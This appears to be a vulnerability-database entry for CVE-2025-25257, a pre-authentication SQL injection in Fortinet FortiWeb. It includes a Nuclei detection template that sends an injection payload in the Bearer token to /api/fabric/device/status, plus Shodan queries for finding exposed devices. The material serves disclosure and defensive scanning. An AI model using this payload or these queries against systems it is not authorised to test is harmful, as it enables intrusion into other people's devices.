CVE-2025-25257: Fortinet FortiWeb - SQL Injection

日期: 2025-08-01 | 影响软件: Fortinet FortiWeb | POC: 已公开

漏洞描述

An improper neutralization of special elements used in an SQL command ('SQL Injection') vulnerability [CWE-89] in FortiWeb may allow an unauthenticated attacker to execute unauthorized SQL code or commands via crafted HTTP or HTTPS requests.

PoC代码[已公开]

id: CVE-2025-25257

info:
  name: Fortinet FortiWeb - SQL Injection
  author: watchtowr,johnk3r
  severity: critical
  description: |
    An improper neutralization of special elements used in an SQL command ('SQL Injection') vulnerability [CWE-89] in FortiWeb may allow an unauthenticated attacker to execute unauthorized SQL code or commands via crafted HTTP or HTTPS requests.
  impact: |
    An attacker can exploit this vulnerability to execute unauthorized SQL commands, potentially leading to data exposure, data manipulation, or system compromise.
  remediation: |
    Apply the latest security patches provided by Fortinet to fix the SQL injection vulnerability in FortiWeb.
  reference:
    - https://labs.watchtowr.com/pre-auth-sql-injection-to-rce-fortinet-fortiweb-fabric-connector-cve-2025-25257/
    - https://fortiguard.fortinet.com/psirt/FG-IR-25-151
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-25257
    epss-score: 0.38658
    epss-percentile: 0.97163
    cwe-id: CWE-89
    cpe: cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: fortinet
    product: fortiweb
    shodan-query:
      - ssl:"cn=fortiweb"
      - title:"FortiWeb - "
  tags: cve,cve2025,fortinet,fortiweb,sqli,unauth,kev,vkev

http:
  - raw:
      - |
        GET /api/fabric/device/status HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer AAAAAA'or'1'='1

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'serial'
          - 'fortiweb'
          - 'device_type'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502201e88d98177cbeb0f4676ac7b1f8f3ca9b3333fddf10023320c413b7c9bdef1f3022100f63cc9374770494a583c89e97550b0a08c589c2d22f2123ada975e229fbfb87a:922c64590222798bb761d5b6d8e72950

相关漏洞推荐